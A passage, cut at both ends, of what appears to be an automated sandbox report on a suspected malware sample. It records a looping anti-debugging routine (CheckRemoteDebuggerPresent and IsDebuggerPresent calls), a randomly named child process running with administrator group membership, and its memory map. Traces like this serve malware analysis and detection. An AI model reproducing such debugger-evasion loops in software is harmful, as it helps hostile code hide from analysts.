CloseHandle (hObject=0x220) returned 1 [0258.735] OutputDebugStringW (lpOutputString="") [0259.742] GetCurrentProcessId () returned 0x530 [0259.743] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x22c [0259.743] GetExitCodeProcess (in: hProcess=0x22c, lpExitCode=0x24d9ee4 | out: lpExitCode=0x24d9ee4*=0x103) returned 1 [0259.743] CheckRemoteDebuggerPresent (in: hProcess=0x22c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0259.743] IsDebuggerPresent () returned 0 [0259.743] GetCurrentProcessId () returned 0x530 [0259.743] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x26c [0259.744] GetExitCodeProcess (in: hProcess=0x26c, lpExitCode=0x24d9f9c | out: lpExitCode=0x24d9f9c*=0x103) returned 1 [0259.744] CloseHandle (hObject=0x26c) returned 1 [0259.744] OutputDebugStringW (lpOutputString="") [0260.831] GetCurrentProcessId () returned 0x530 [0260.831] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2c8 [0260.831] GetExitCodeProcess (in: hProcess=0x2c8, lpExitCode=0x24f59c4 | out: lpExitCode=0x24f59c4*=0x103) returned 1 [0260.832] CheckRemoteDebuggerPresent (in: hProcess=0x2c8, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0260.832] IsDebuggerPresent () returned 0 [0260.832] GetCurrentProcessId () returned 0x530 [0260.832] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2c4 [0260.832] GetExitCodeProcess (in: hProcess=0x2c4, lpExitCode=0x24f5a7c | out: lpExitCode=0x24f5a7c*=0x103) returned 1 [0260.832] CloseHandle (hObject=0x2c4) returned 1 [0260.832] OutputDebugStringW (lpOutputString="") [0261.848] GetCurrentProcessId () returned 0x530 [0261.848] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2cc [0261.848] GetExitCodeProcess (in: hProcess=0x2cc, lpExitCode=0x24f5ca4 | out: lpExitCode=0x24f5ca4*=0x103) returned 1 [0261.849] CheckRemoteDebuggerPresent (in: hProcess=0x2cc, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0261.849] IsDebuggerPresent () returned 0 [0261.849] GetCurrentProcessId () returned 0x530 [0261.849] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2d0 [0261.849] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0x24f5d5c | out: lpExitCode=0x24f5d5c*=0x103) returned 1 [0261.849] CloseHandle (hObject=0x2d0) returned 1 [0261.849] OutputDebugStringW (lpOutputString="") [0262.893] GetCurrentProcessId () returned 0x530 [0262.894] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2dc [0262.894] GetExitCodeProcess (in: hProcess=0x2dc, lpExitCode=0x24f69c8 | out: lpExitCode=0x24f69c8*=0x103) returned 1 [0262.894] CheckRemoteDebuggerPresent (in: hProcess=0x2dc, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0262.894] IsDebuggerPresent () returned 0 [0262.894] GetCurrentProcessId () returned 0x530 [0262.894] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2e0 [0262.894] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x24f6a80 | out: lpExitCode=0x24f6a80*=0x103) returned 1 [0262.894] CloseHandle (hObject=0x2e0) returned 1 [0262.894] OutputDebugStringW (lpOutputString="") [0264.094] GetCurrentProcessId () returned 0x530 [0264.094] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2e4 [0264.094] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x24fc430 | out: lpExitCode=0x24fc430*=0x103) returned 1 [0264.094] CheckRemoteDebuggerPresent (in: hProcess=0x2e4, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0264.094] IsDebuggerPresent () returned 0 [0264.094] GetCurrentProcessId () returned 0x530 [0264.094] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2e8 [0264.095] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x24fc4e8 | out: lpExitCode=0x24fc4e8*=0x103) returned 1 [0264.095] CloseHandle (hObject=0x2e8) returned 1 [0264.095] OutputDebugStringW (lpOutputString="") [0265.108] GetCurrentProcessId () returned 0x530 [0265.108] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2ec [0265.108] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x24fc710 | out: lpExitCode=0x24fc710*=0x103) returned 1 [0265.108] CheckRemoteDebuggerPresent (in: hProcess=0x2ec, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0265.108] IsDebuggerPresent () returned 0 [0265.108] GetCurrentProcessId () returned 0x530 [0265.108] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2f0 [0265.108] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x24fc7d4 | out: lpExitCode=0x24fc7d4*=0x103) returned 1 [0265.109] CloseHandle (hObject=0x2f0) returned 1 [0265.109] OutputDebugStringW (lpOutputString="") [0266.121] GetCurrentProcessId () returned 0x530 [0266.122] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2f4 [0266.122] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0x24fc9fc | out: lpExitCode=0x24fc9fc*=0x103) returned 1 [0266.122] CheckRemoteDebuggerPresent (in: hProcess=0x2f4, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0266.122] IsDebuggerPresent () returned 0 [0266.122] GetCurrentProcessId () returned 0x530 [0266.122] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2f8 [0266.122] GetExitCodeProcess (in: hProcess=0x2f8, lpExitCode=0x24fcab4 | out: lpExitCode=0x24fcab4*=0x103) returned 1 [0266.122] CloseHandle (hObject=0x2f8) returned 1 [0266.122] OutputDebugStringW (lpOutputString="") [0267.167] GetCurrentProcessId () returned 0x530 [0267.167] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x2fc [0267.167] GetExitCodeProcess (in: hProcess=0x2fc, lpExitCode=0x24fccdc | out: lpExitCode=0x24fccdc*=0x103) returned 1 [0267.167] CheckRemoteDebuggerPresent (in: hProcess=0x2fc, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0267.167] IsDebuggerPresent () returned 0 [0267.167] GetCurrentProcessId () returned 0x530 [0267.167] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x300 [0267.167] GetExitCodeProcess (in: hProcess=0x300, lpExitCode=0x24fcd94 | out: lpExitCode=0x24fcd94*=0x103) returned 1 [0267.167] CloseHandle (hObject=0x300) returned 1 [0267.168] OutputDebugStringW (lpOutputString="") [0269.288] GetCurrentProcessId () returned 0x530 [0269.288] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x304 [0269.288] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x24fcfbc | out: lpExitCode=0x24fcfbc*=0x103) returned 1 [0269.289] CheckRemoteDebuggerPresent (in: hProcess=0x304, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0269.289] IsDebuggerPresent () returned 0 [0269.289] GetCurrentProcessId () returned 0x530 [0269.289] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x308 [0269.289] GetExitCodeProcess (in: hProcess=0x308, lpExitCode=0x24fd074 | out: lpExitCode=0x24fd074*=0x103) returned 1 [0269.289] CloseHandle (hObject=0x308) returned 1 [0269.289] OutputDebugStringW (lpOutputString="") [0270.868] GetCurrentProcessId () returned 0x530 [0270.868] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x30c [0270.868] GetExitCodeProcess (in: hProcess=0x30c, lpExitCode=0x24fd29c | out: lpExitCode=0x24fd29c*=0x103) returned 1 [0270.868] CheckRemoteDebuggerPresent (in: hProcess=0x30c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0270.869] IsDebuggerPresent () returned 0 [0270.869] GetCurrentProcessId () returned 0x530 [0270.869] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x310 [0270.870] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x24fd354 | out: lpExitCode=0x24fd354*=0x103) returned 1 [0270.870] CloseHandle (hObject=0x310) returned 1 [0270.870] OutputDebugStringW (lpOutputString="") [0271.878] GetCurrentProcessId () returned 0x530 [0271.878] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x314 [0271.878] GetExitCodeProcess (in: hProcess=0x314, lpExitCode=0x24fd57c | out: lpExitCode=0x24fd57c*=0x103) returned 1 [0271.878] CheckRemoteDebuggerPresent (in: hProcess=0x314, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0271.878] IsDebuggerPresent () returned 0 [0271.878] GetCurrentProcessId () returned 0x530 [0271.879] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x318 [0271.879] GetExitCodeProcess (in: hProcess=0x318, lpExitCode=0x24fd634 | out: lpExitCode=0x24fd634*=0x103) returned 1 [0271.879] CloseHandle (hObject=0x318) returned 1 [0271.879] OutputDebugStringW (lpOutputString="") [0272.892] GetCurrentProcessId () returned 0x530 [0272.892] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x31c [0272.892] GetExitCodeProcess (in: hProcess=0x31c, lpExitCode=0x24fd85c | out: lpExitCode=0x24fd85c*=0x103) returned 1 [0272.892] CheckRemoteDebuggerPresent (in: hProcess=0x31c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0272.892] IsDebuggerPresent () returned 0 [0272.893] GetCurrentProcessId () returned 0x530 [0272.893] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x320 [0272.893] GetExitCodeProcess (in: hProcess=0x320, lpExitCode=0x24fd914 | out: lpExitCode=0x24fd914*=0x103) returned 1 [0272.893] CloseHandle (hObject=0x320) returned 1 [0272.893] OutputDebugStringW (lpOutputString="") [0273.906] GetCurrentProcessId () returned 0x530 [0273.906] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x324 [0273.907] GetExitCodeProcess (in: hProcess=0x324, lpExitCode=0x24fdb3c | out: lpExitCode=0x24fdb3c*=0x103) returned 1 [0273.907] CheckRemoteDebuggerPresent (in: hProcess=0x324, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0273.907] IsDebuggerPresent () returned 0 [0273.907] GetCurrentProcessId () returned 0x530 [0273.907] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x328 [0273.907] GetExitCodeProcess (in: hProcess=0x328, lpExitCode=0x24fdbf4 | out: lpExitCode=0x24fdbf4*=0x103) returned 1 [0273.907] CloseHandle (hObject=0x328) returned 1 [0273.907] OutputDebugStringW (lpOutputString="") [0274.920] GetCurrentProcessId () returned 0x530 [0274.920] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x32c [0274.920] GetExitCodeProcess (in: hProcess=0x32c, lpExitCode=0x24fde1c | out: lpExitCode=0x24fde1c*=0x103) returned 1 [0274.921] CheckRemoteDebuggerPresent (in: hProcess=0x32c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0274.921] IsDebuggerPresent () returned 0 [0274.921] GetCurrentProcessId () returned 0x530 [0274.921] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x330 [0274.921] GetExitCodeProcess (in: hProcess=0x330, lpExitCode=0x24fded4 | out: lpExitCode=0x24fded4*=0x103) returned 1 [0274.921] CloseHandle (hObject=0x330) returned 1 [0274.921] OutputDebugStringW (lpOutputString="") [0275.934] GetCurrentProcessId () returned 0x530 [0275.934] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x334 [0275.934] GetExitCodeProcess (in: hProcess=0x334, lpExitCode=0x24fe0fc | out: lpExitCode=0x24fe0fc*=0x103) returned 1 [0275.934] CheckRemoteDebuggerPresent (in: hProcess=0x334, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0275.935] IsDebuggerPresent () returned 0 [0275.935] GetCurrentProcessId () returned 0x530 [0275.935] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x338 [0275.935] GetExitCodeProcess (in: hProcess=0x338, lpExitCode=0x24fe1b4 | out: lpExitCode=0x24fe1b4*=0x103) returned 1 [0275.935] CloseHandle (hObject=0x338) returned 1 [0275.935] OutputDebugStringW (lpOutputString="") [0276.980] GetCurrentProcessId () returned 0x530 [0276.981] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x33c [0276.981] GetExitCodeProcess (in: hProcess=0x33c, lpExitCode=0x24fe3dc | out: lpExitCode=0x24fe3dc*=0x103) returned 1 [0276.981] CheckRemoteDebuggerPresent (in: hProcess=0x33c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0276.981] IsDebuggerPresent () returned 0 [0276.981] GetCurrentProcessId () returned 0x530 [0276.981] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x340 [0276.981] GetExitCodeProcess (in: hProcess=0x340, lpExitCode=0x24fe494 | out: lpExitCode=0x24fe494*=0x103) returned 1 [0276.982] CloseHandle (hObject=0x340) returned 1 [0276.982] OutputDebugStringW (lpOutputString="") [0277.993] GetCurrentProcessId () returned 0x530 [0277.993] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x344 [0277.993] GetExitCodeProcess (in: hProcess=0x344, lpExitCode=0x24fe6bc | out: lpExitCode=0x24fe6bc*=0x103) returned 1 [0277.994] CheckRemoteDebuggerPresent (in: hProcess=0x344, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0277.994] IsDebuggerPresent () returned 0 [0277.994] GetCurrentProcessId () returned 0x530 [0277.994] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x348 [0277.994] GetExitCodeProcess (in: hProcess=0x348, lpExitCode=0x24fe780 | out: lpExitCode=0x24fe780*=0x103) returned 1 [0277.994] CloseHandle (hObject=0x348) returned 1 [0277.995] OutputDebugStringW (lpOutputString="") [0279.007] GetCurrentProcessId () returned 0x530 [0279.007] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x34c [0279.007] GetExitCodeProcess (in: hProcess=0x34c, lpExitCode=0x24fe9a8 | out: lpExitCode=0x24fe9a8*=0x103) returned 1 [0279.008] CheckRemoteDebuggerPresent (in: hProcess=0x34c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0279.008] IsDebuggerPresent () returned 0 [0279.008] GetCurrentProcessId () returned 0x530 [0279.008] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x350 [0279.008] GetExitCodeProcess (in: hProcess=0x350, lpExitCode=0x24fea60 | out: lpExitCode=0x24fea60*=0x103) returned 1 [0279.008] CloseHandle (hObject=0x350) returned 1 [0279.008] OutputDebugStringW (lpOutputString="") [0280.021] GetCurrentProcessId () returned 0x530 [0280.022] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x35c [0280.022] GetExitCodeProcess (in: hProcess=0x35c, lpExitCode=0x24fec88 | out: lpExitCode=0x24fec88*=0x103) returned 1 [0280.022] CheckRemoteDebuggerPresent (in: hProcess=0x35c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0280.022] IsDebuggerPresent () returned 0 [0280.023] GetCurrentProcessId () returned 0x530 [0280.023] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x360 [0280.023] GetExitCodeProcess (in: hProcess=0x360, lpExitCode=0x24fed40 | out: lpExitCode=0x24fed40*=0x103) returned 1 [0280.023] CloseHandle (hObject=0x360) returned 1 [0280.023] OutputDebugStringW (lpOutputString="") [0281.035] GetCurrentProcessId () returned 0x530 [0281.036] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x364 [0281.036] GetExitCodeProcess (in: hProcess=0x364, lpExitCode=0x24fef68 | out: lpExitCode=0x24fef68*=0x103) returned 1 [0281.036] CheckRemoteDebuggerPresent (in: hProcess=0x364, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0281.036] IsDebuggerPresent () returned 0 [0281.037] GetCurrentProcessId () returned 0x530 [0281.037] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x368 [0281.037] GetExitCodeProcess (in: hProcess=0x368, lpExitCode=0x24ff020 | out: lpExitCode=0x24ff020*=0x103) returned 1 [0281.037] CloseHandle (hObject=0x368) returned 1 [0281.038] OutputDebugStringW (lpOutputString="") [0282.314] GetCurrentProcessId () returned 0x530 [0282.314] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x36c [0282.314] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0x24ff248 | out: lpExitCode=0x24ff248*=0x103) returned 1 [0282.314] CheckRemoteDebuggerPresent (in: hProcess=0x36c, pbDebuggerPresent=0x4d7f238 | out: pbDebuggerPresent=0x4d7f238) returned 1 [0282.315] IsDebuggerPresent () returned 0 [0282.315] GetCurrentProcessId () returned 0x530 [0282.315] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x370 [0282.315] GetExitCodeProcess (in: hProcess=0x370, lpExitCode=0x24ff300 | out: lpExitCode=0x24ff300*=0x103) returned 1 [0282.315] CloseHandle (hObject=0x370) returned 1 [0282.315] OutputDebugStringW (lpOutputString="") Thread: id = 112 os_tid = 0x5e8 Thread: id = 113 os_tid = 0x5d0 Process: id = "8" image_name = "winzvg4hxq8.exe" filename = "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe" page_root = "0x6e839000" os_pid = "0x33c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x530" cmd_line = "\"C:\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed78" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10049 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10050 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10051 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10052 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10053 start_va = 0xf0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10054 start_va = 0x230000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 10055 start_va = 0xc30000 end_va = 0xc7dfff monitored = 1 entry_point = 0xc695ce region_type = mapped_file name = "winzvg4hxq8.exe" filename = "\\Program Files (x86)\\Cmrkpgp\\winzvg4hxq8.exe" (normalized: "c:\\program files (x86)\\cmrkpgp\\winzvg4hxq8.exe") Region: id = 10056 start_va = 0x77630000 end_va = 0x777d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10057 start_va = 0x77810000 end_va = 0x7798ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10058 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 10059 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 10060 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 10061 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 10062 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10063 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10064 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10065 start_va = 0x400000 end_va = 0x428fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10066 start_va = 0x180000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 10067 start_va = 0x73f30000 end_va = 0x73f37fff monitored = 0 entry_point = 0x73f320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10068 start_va = 0x73f40000 end_va = 0x73f9bfff monitored = 0 entry_point = 0x73f7f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10069 start_va = 0x73fa0000 end_va = 0x73fdefff monitored = 0 entry_point = 0x73fce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10070 start_va = 0x77510000 end_va = 0x7762efff monitored = 0 entry_point = 0x77525340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10071 start_va = 0x754f0000 end_va = 0x755fffff monitored = 0 entry_point = 0x75503283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10072 start_va = 0x77510000 end_va = 0x7762efff monitored = 0 entry_point = 0x77525340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10073 start_va = 0x77510000 end_va = 0x7762efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077510000" filename = "" Region: id = 10074 start_va = 0x77410000 end_va = 0x77509fff monitored = 0 entry_point = 0x7742a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10075 start_va = 0x77410000 end_va = 0x77509fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077410000" filename = "" Region: id = 10076 start_va = 0x430000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 10077 start_va = 0x754f0000 end_va = 0x755fffff monitored = 0 entry_point = 0x75503283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10078 start_va = 0x76ab0000 end_va = 0x76af6fff monitored = 0 entry_point = 0x76ab74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10079 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10080 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10081 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10082 start_va = 0x60000 end_va = 0xc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10083 start_va = 0x580000 end_va = 0x6bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10086 start_va = 0x6c0000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 10087 start_va = 0x850000 end_va = 0xb52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 10088 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10089 start_va = 0x765e0000 end_va = 0x7667ffff monitored = 0 entry_point = 0x765f49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10090 start_va = 0x76530000 end_va = 0x765dbfff monitored = 0 entry_point = 0x7653a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10091 start_va = 0x772f0000 end_va = 0x77308fff monitored = 0 entry_point = 0x772f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10092 start_va = 0x75600000 end_va = 0x756effff monitored = 0 entry_point = 0x75610569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10093 start_va = 0x75360000 end_va = 0x753bffff monitored = 0 entry_point = 0x7537a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10094 start_va = 0x75350000 end_va = 0x7535bfff monitored = 0 entry_point = 0x753510e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10095 start_va = 0x580000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10096 start_va = 0x130000 end_va = 0x158fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 10097 start_va = 0x430000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 10098 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10099 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = 